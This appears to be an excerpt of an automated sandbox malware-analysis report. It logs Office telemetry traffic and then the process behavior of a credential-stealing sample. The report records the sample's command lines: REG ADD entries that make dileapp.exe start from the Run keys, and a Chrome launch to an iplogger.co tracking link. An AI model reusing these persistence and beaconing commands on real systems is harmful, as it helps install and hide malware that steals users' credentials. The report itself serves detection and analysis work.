                                                                                                                                      2024-11-29 22:11:56 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      144192.168.2.44989713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:56 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:57 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB256F43"
                                                                                                                                      x-ms-request-id: 465003af-501e-00a3-2ca1-42c0f2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221157Z-174f7845968n2hr8hC1EWR9cag000000106g000000008ce9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:57 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      145192.168.2.44989813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:57 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:57 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB866CDB"
                                                                                                                                      x-ms-request-id: 72821319-501e-0047-4515-41ce6c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221157Z-174f7845968kvnqxhC1EWRmf3g0000000mbg000000007zgz
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:57 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      146192.168.2.44989913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:57 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:57 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                      ETag: "0x8DC582BE5B7B174"
                                                                                                                                      x-ms-request-id: 62c5240a-b01e-0097-3411-414f33000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221157Z-174f7845968pght8hC1EWRyvxg00000003kg00000000kr4k
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:58 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      147192.168.2.44990013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:58 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:58 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1399
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                      ETag: "0x8DC582BE976026E"
                                                                                                                                      x-ms-request-id: 5bc480f4-b01e-001e-79d9-410214000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221158Z-174f7845968psccphC1EWRuz9s00000010t000000000adk1
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:58 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      148192.168.2.44990113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:58 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                      ETag: "0x8DC582BDC13EFEF"
                                                                                                                                      x-ms-request-id: 069bf3a9-401e-0016-0bf6-4153e0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221159Z-174f7845968nxc96hC1EWRspw8000000108g00000000bku7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:59 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      149192.168.2.44990213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:58 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1425
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                      ETag: "0x8DC582BE6BD89A1"
                                                                                                                                      x-ms-request-id: c922d918-601e-0032-6e42-41eebb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221159Z-174f7845968cpnpfhC1EWR3afc000000101g00000000n2u2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:59 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:17:09:54
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:2'210'104 bytes
                                                                                                                                      MD5 hash:EFF5FBE427181FE1A3EED978CF0C9A36
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
                                                                                                                                      Imagebase:0x240000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                      File size:59'392 bytes
                                                                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                      File size:59'392 bytes
                                                                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                      File size:1'928'704 bytes
                                                                                                                                      MD5 hash:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:17:09:55
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:17:09:57
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:17:10:04
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                      File size:1'928'704 bytes
                                                                                                                                      MD5 hash:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:17:10:11
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 --field-trial-handle=2324,i,4398833279190329867,13329652877224492584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:17:10:12
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                      File size:1'928'704 bytes
                                                                                                                                      MD5 hash:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1900851363.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1980367222.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1982622436.0000000001B28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.1954874686.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:17:10:21
                                                                                                                                      Start date:29/11/2024
                                                                                                                                      Path:C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Netstat\dileapp.exe"
                                                                                                                                      Imagebase:0xfd0000
                                                                                                                                      File size:1'928'704 bytes
